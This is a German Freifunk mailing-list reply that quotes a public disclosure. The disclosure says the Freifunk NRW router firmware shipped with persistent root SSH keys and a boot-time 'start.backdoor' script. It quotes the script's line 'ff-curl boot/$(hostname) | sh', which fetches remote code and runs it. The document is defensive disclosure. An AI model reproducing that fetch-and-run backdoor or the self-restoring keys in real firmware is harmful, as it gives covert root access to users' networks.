[WLANtalk] Hallo Vorstand vom Verbund Freie Netzwerke NRW, Hallo Liste,
Moritz Warning
moritzwarning at web.de
Do Mär 26 21:33:30 CET 2015
wtf - viel mehr fällt mir dazu erstmal nicht ein.
Ich dachte authorized_keys wären nur für _eigene_ Router?
On 03/26/2015 08:20 PM, Malte Moeller wrote:
> Hallo Vorstand vom Verbund Freie Netzwerke NRW, Hallo Liste,
>
> da für mich in Frage kam bei einem Bekannten in Leverkusen einen "HotSpot"
> von euch aufzustellen habe ich mir eure Firmware zum Test selber
> Installiert.
>
> Die Firmware enthält von vorne herein mehrere ssh keys die vollen root
> Zugang zu den Geräten (und damit dem gesamten lokalen Netzwerk)
> ermöglichen, neben den privaten Schlüsseln von tobias at freifunk-nrw.de und
> kevinolbrich at Kevins-MacBook-Pro.local werden mutmaßlich auch die Schlüssel
> von Servern hinzugefügt: maintsb, maintrw1 und maintrw2. Siehe:
> https://github.com/FF-NRW/Firmware/blob/master/authorized_keys.default
>
> Werden diese Schlüssel gelöscht, stellt sie ein Skript beim booten wieder
> her.
>
> Zudem startet der Knoten per default, zumindest bei jedem Bootvorgang,
> beliebigen code, den er mit dem Skript /etc/freifunk/start.backdoor nach
> lädt:
>
> ff-curl boot/$(cat /proc/sys/kernel/hostname) | sh
>
> Derartig konfigurierte Knoten wurden auch in mindesten einem Parteibüro der
> Piraten aufgestellt. Es ist davon auszugehen, dass auch die andern Knoten
> im Feld, Beispielsweise im Rathaus in Wermelskirchen über derartiges
> verfügen:
> http://freifunk.liztv.net/batmap/51.141062277444036,7.214093533172478,18
>
> Bei einer Durchsicht eures gits habe ich festgestellt, dass zumindest das
> Backdoor Modul inzwischen wieder entfernt wurde:
> https://github.com/FF-NRW/Firmware/commit/bd682a057894c6d06136a18378de66c640abc2c3
>
> Allerdings vom selben User, der es im Juli 2014 implementiert hat:
> https://github.com/FF-NRW/Firmware/commits/87251c48cb68b82f67647b2fa182d1b045500268/files/default/etc/freifunk/start.backdoor
>
> Ich fordere den Vorstand des VfN auf die Angelegenheit zu klären und sofern
> sie strafrechtlich relevant ist gegen die entsprechenden Mitglieder Anzeige
> zu erstatten. Eine öffentliche Stellungnahme zur vergangenen Praxis und dem
> zukünftigen Vorgehen halte ich für zwingend notwendig!
>
> Vom Förderverein Freie Netzwerke e. V. wünsche ich mir eine klare
> Distanzierung von derartigem Verhalten. Ich persönlich empfinde es als
> unerträglich, dass ein Verein, der derartiges Verhalten von einem
> Vorstandsmitglied duldet, von euch als Freifunk anerkannt wird. Schlimmer,
> sich Freifunk NRW nennt und damit weitere Vereine in Verruf zieht.
>
> Viele Grüße
> Malte Möller
>
>
>
> _______________________________________________
> WLANtalk mailing list
> WLANtalk at freifunk.net
> Abonnement abbestellen? -> http://lists.freifunk.net/mailman/listinfo/wlantalk-freifunk.net
>
> Weitere Infos zu den freifunk.net Mailinglisten und zur An- und Abmeldung unter http://freifunk.net/mailinglisten
>
-------------- nächster Teil --------------
Ein Dateianhang mit Binärdaten wurde abgetrennt...
Dateiname : signature.asc
Dateityp : application/pgp-signature
Dateigröße : 473 bytes
Beschreibung: OpenPGP digital signature
URL : <http://lists.freifunk.net/pipermail/wlantalk-freifunk.net/attachments/20150326/cded63e5/attachment.sig>
Mehr Informationen über die Mailingliste WLANtalk